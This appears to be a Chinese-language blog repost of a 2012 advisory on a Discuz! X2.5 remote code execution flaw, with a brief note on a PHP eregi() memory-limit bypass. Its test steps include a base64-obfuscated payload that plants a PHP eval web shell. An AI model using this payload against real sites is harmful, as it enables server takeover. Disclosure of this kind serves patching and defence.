发布时间: 2012-04-27 漏洞版本:Discuz! X2.5Release20120407 漏洞描述: Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞, 远程攻击者可利用此漏洞执行远程任意代码。要成功利用此漏洞需要目标启用seo功能。
测试方法: @Sebug.net dis 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 1,注册任意账户 2,登陆用户,发表blog日志(注意是日志) 3,添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4,访问日志,论坛根目录下生成demo.php,一句话密码C
Discuz已经发布了新版Discuz! X2.5 R20120427 http://www.discuz.net/thread-2744369-1-1.html
参考 http://sebug.net/vuldb/ssvid-60082 http://www.wooyun.org/bugs/wooyun-2012-06420 http://yaonie.org/archives/165
补充:PHP 5.4/5.3弃用eregi()函数内存限制绕过漏洞 危害 远程攻击者可以利用漏洞耗尽系统内存。
攻击所需条件 攻击者必须访问PHP应用。
漏洞信息 PHP 5.3之后弃用了基于POSIX规则表达式的函数如eregi,但在5.4.0版本中仍然使用这些函数,可被利用绕过memory_limit,通过eregi()耗尽内存。
测试方法 http://cxsecurity.com/issue/WLB-2012030271 漏洞消息链接 http://marc.info/?l=bugtraq&m=133311683110469&w=2
漏洞消息标题 PHP 5.4/5.3 deprecated eregi() memory_limit bypass
No Responses (yet)
Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.